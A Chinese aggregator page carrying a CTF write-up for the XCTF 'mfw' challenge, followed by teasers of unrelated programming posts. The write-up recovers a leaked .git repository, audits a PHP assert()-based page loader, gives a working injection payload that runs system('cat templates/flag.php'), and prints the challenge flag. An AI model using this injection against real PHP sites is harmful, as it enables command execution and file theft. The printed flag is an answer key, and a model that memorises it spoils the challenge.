当前位置：首页 > news >正文

攻防世界：mfw[WriteUP]

news 2026/5/12 15:10:09

根据题目提示考虑是git库泄露

这里在地址栏后加.git也可以验证是git库泄露

使用GitHack工具对git库进行恢复重建

在templates目录下存在flag.php文件，但里面并没有flag

有内容的只有主目录下的index.php

index.php源码：

<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>
<!DOCTYPE html>
<html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>My PHP Website</title><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" /></head><body><nav class="navbar navbar-inverse navbar-fixed-top"><div class="container"><div class="navbar-header"><button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="navbar-brand" href="#">Project name</a></div><div id="navbar" class="collapse navbar-collapse"><ul class="nav navbar-nav"><li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li><li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li><li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li><!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> --></ul></div></div></nav><div class="container" style="margin-top: 50px"><?phprequire_once $file;?></div><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" /><script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" /></body>
</html>

提取需要审计的PHP代码

代码审计：

<?phpif (isset($_GET['page'])) {    //判断$page是否存在$page = $_GET['page'];    //存在就以get方法取值
} else {$page = "home";    //不存在就将"home"赋值给新建$page
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//assert函数返回值如果不为true则执行die命令则PHP脚本终止运行
//所以我们可以构造一个$file使其直接执行系统命令并加上注释符把判断".."的部分注释掉并即可// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
//判断$file文件是否存在，不存在直接终止脚本?>

其中有一串关键代码：$file = "templates/" . $page . ".php";

我们通过前面的GitHack已知悉flag.php文件就在templates目录下

所以我们构造payload的时候使$page有cat flag.php命令就行

重点：assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

首先使strpos函数闭合，利用函数结构strpost('，那么$file的前半部分应该是：')

后面接上命令： or system('cat templates/flag.php')，再接上注释符：//

如此这般，该条代码最后执行的效果应该是：【绿色部分被//注释】

assert("strpos('') or system('cat templates/flag.php');//', '..') === false") or die("Detected hacking attempt!");

strpost('')参数为空时返回false，所以直接执行or后面的代码

最后构造payload：URL/?page=') or system('cat templates/flag.php');//

flag：cyberpeace{a97ae1229c2668130daa2f0f432fdd1b}

攻防世界：mfw[WriteUP]

根据题目提示考虑是git库泄露这里在地址栏后加.git也可以验证是git库泄露使用GitHack工具对git库进行恢复重建在templates目录下存在flag.php文件，但里面并没有flag 有内容的只有主目录下的index.php index.php源码： <?phpif (isset($_GET[page…...

编程日记 2024/4/3 6:00:51

mysq性能优化-my.cnf配置文件参数调整

MySQL 优化配置文件（my.cnf 或 my.ini）是调整 MySQL 服务器性能的重要手段之一。以下是一些常见的场景，可以通过调整配置文件参数值来优化 MySQL： 1. **提高并发处理能力**： - innodb_buffer_pool_size：增…...

编程日记 2024/4/3 5:59:50

ddres( ) 组站星双差方程和设计矩阵

1 ddres( )参数介绍 rtklib中进行的单频解算双差观测值，单差的模糊度单频点双差 DD (double-differenced) phase/code residuals ------------------------------ x 模糊度 P 方差-协方差阵 sat 共识卫星列表 ns 共识卫星数量 y…...

编程日记 2024/4/3 5:58:48

【OpenCV】图像像素的遍历

1 前言介绍两种遍历像素的方法（非指针、指针）。注意：.at() .ptr()的作用、用法。相关API： Mat对象.ptr() Mat对象.at() 2 代码及内容 #include "iostream" #include "opencv2/opencv.hpp"using namespac…...

编程日记 2024/4/3 5:56:46

（超简单）构建高可用网络应用：使用Nginx进行负载均衡与健康检查

当构建高可用的网络应用时，负载均衡是至关重要的技术之一。Nginx 是一个强大的开源反向代理服务器，提供了丰富的负载均衡功能，包括负载均衡算法和健康检查。在本篇博客中，我们将讨论如何使用 Nginx 进行负载均衡，并结合…...

编程日记 2024/4/3 5:55:45

华为OD面试手撕算法-合并排序数组

题目描述本题是leetcode一道简单题：合并两个有序数组，但是对于时间和空间复杂度面试官明确给出了限制。 // 给定两个排序后的数组 A 和 B，其中 A 的末端有足够的缓冲空间容纳 B。编写一个方法，将 B 合并入 A 并排序。 // 初始化…...

编程日记 2024/4/3 5:54:44

云智慧发布对象关系型数据库CloudPanguDB，打破传统技术壁垒

近日，云智慧推出关系型数据库CloudPanguDB（中文名称：盘古数据库），旨在通过高兼容性能和创新技术架构，降低企业项目整体运营成本。无论是处理海量复杂数据，还是构建清晰有序的数据结构关系&…...

编程日记 2024/4/3 5:53:43

6.8物联网RK3399项目开发实录-驱动开发之RTC实时时钟的使用（wulianjishu666）

90款行业常用传感器单片机程序及资料【stm32,stc89c52,arduino适用】链接：https://pan.baidu.com/s/1M3u8lcznKuXfN8NRoLYtTA?pwdc53f RTC 使用简介 AIO-3399J 开发板上有一个集成于 RK808 上的RTC(Real Time Clock)，主要功能有时钟&#xff0c…...

编程日记 2024/4/3 5:52:42

VUE——概述

vue是前端框架，基于MVVM思想。引入从官网下载vue文件 <script src"js/vue.js"></script> 定义vue对象 new Vue({el: "#x",//vue接管区域，#表示选择器，x是id名字data: {message: "y"} })案例…...

编程日记 2024/4/3 5:51:41

合宙4G模块Air724UG调试过程(短信发送、上传数据到华为云IOT)

合宙Air724UG-4G模块AT指令调试接线演示一、前言上海合宙Air724UG模块是一款高性能的4G Cat.1通信模组（全网通模块，支持移动、联通、电信，支持短信和网络通信），为开发者提供了丰富的接口和开发方式。在本文中，将详述调试与集成该模块的关键步骤：（1）从基础硬件配…...

编程日记 2024/4/3 5:50:40

【项目新功能开发篇】需求分析和开发设计

作者介绍：本人笔名姑苏老陈，从事JAVA开发工作十多年了，带过大学刚毕业的实习生，也带过技术团队。最近有个朋友的表弟，马上要大学毕业了，想从事JAVA开发工作，但不知道从何处入手。于是&#xff0…...

编程日记 2024/4/3 5:49:39

CentOS 7 下离线安装RabbitMQ教程

CentOS 7 下安装RabbitMQ教程一、做准备（VMWare 虚拟机上的 CentOS 7 镜像上安装的） （1）准备RabbitMQ的安装包（rabbitmq-server-3.8.5-1.el7.noarch）下载地址mq https://github.com/rabbitmq/rabbitmq-se…...

编程日记 2024/4/3 5:48:38

【Servlet】session保存作用域

session保存作用域：一次会话范围都有效 Java的服务器端，有一块内存专门存储在session保存作用域的数据。 session保存作用域是和具体的某一个session对应的。常用API： void session.setAttribute(k, v)Object session.getAttrivute(k) —…...

编程日记 2024/4/3 5:47:36

企业周年庆3d云展厅促进了客企间交流与互动

在数字化浪潮席卷而来的今天，传统的展示方式已难以满足现代人对信息获取与体验的高标准需求。为此，一种革命性的展示方式——线上3D虚拟展厅应运而生，以其独特的魅力逐渐引领展示方式的革新。线上3D虚拟展厅开发，不仅为参与者带来…...

编程日记 2024/4/3 5:46:35

Android Studio学习5——布局layout与视图view

wrap_content，内容有多大，就有多宽（包裹） 布局 padding 边框与它自身的内容 margin 控件与控件之间...

编程日记 2024/4/3 5:45:34

设计模式(15)：迭代器模式

介绍提供一中可以遍历聚合对象的方式。又称为: 游标cursor模式迭代器模式角色抽象聚合类(Aggregate)：提供了聚合相关的方法,并提供获取迭代器的方法；具体集合类(ConcreteAggregate):实现了抽象聚合类；抽象迭代器(Iterator)：…...

编程日记 2024/4/3 5:43:32

前端内部技术分享---前端组件之表格组件的封装与使用（Vue3）

业务背景在我们接触的项目中，PC端的项目中基本上百分之60或以上，都会用到表格，我们最常用的就是element-plus 组件库，相信大家都对el-table 都比较熟悉了，但是在许许多多大同小异的界面中，每次都要写很多…...

编程日记 2024/4/3 5:41:31

盘古开天辟地开始 # 安装brew/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"(echo; echo eval "$(/opt/homebrew/bin/brew shellenv)") >> /Users/wangxin52/.zprofileeval "$(/opt/homeb…...

编程日记 2024/4/3 5:40:30

vue实现相机拍摄，可录视频、拍照片、前置后置切换（简单小demo）

内容比较简单，不做过多赘述，只做分享，测试demo，功能有些缺陷，希望路过的大佬多多指正 /(*/ω＼*) <script setup> import { showToast, showSuccessToast, showFailToast, showLoadingToast } from …...

编程日记 2024/4/3 5:39:28

【项目】牛马点评问题汇总

如果一个人换很多个不同电话号发验证码会怎样项目里没实现，如果让我做的话，我会获得用户的ip地址，然后存到redis里，设置个ttl比如1分钟，每次请求过来后就先看看redis里有没有这个ip，有的话就不发验证码。…...

编程日记 2024/4/3 5:38:27

手把手教你用MOS管搭建防反接电路：从原理图到PCB布局的避坑指南（以立创EDA为例）

从零构建MOS管防反接电路：立创EDA实战全流程解析电源反接是电子设计中最常见的"低级错误"之一，却可能造成毁灭性后果。想象一下：你花费数周完成的智能家居控制器，因为电池装反而瞬间烧毁主控芯片——这种场景在创客社区…...

编程新知 2026/5/12 14:55:55

毕设项目分享大数据共享单车数据分析与可视化(源码分享)

文章目录 0 前言1 课题背景2 数据清洗3 数据可视化热力图整体特征分布**查看2011-2012间的单车租借情况**天气对于租借数量的影响湿度与温度对于租借数量的影响注册用户与未注册用户 4 总结：5 最后 0 前言 🔥 这两年开始毕业设计和毕业答辩的要求和难度…...

编程新知 2026/5/12 14:43:22

如何为iOS 14.0-16.6.1设备安装TrollStore：TrollInstallerX完整指南

如何为iOS 14.0-16.6.1设备安装TrollStore：TrollInstallerX完整指南【免费下载链接】TrollInstallerX A TrollStore installer for iOS 14.0 - 16.6.1 项目地址: https://gitcode.com/gh_mirrors/tr/TrollInstallerX 如果你正在寻找一种可靠且简单的方法在i…...

编程新知 2026/5/12 11:30:40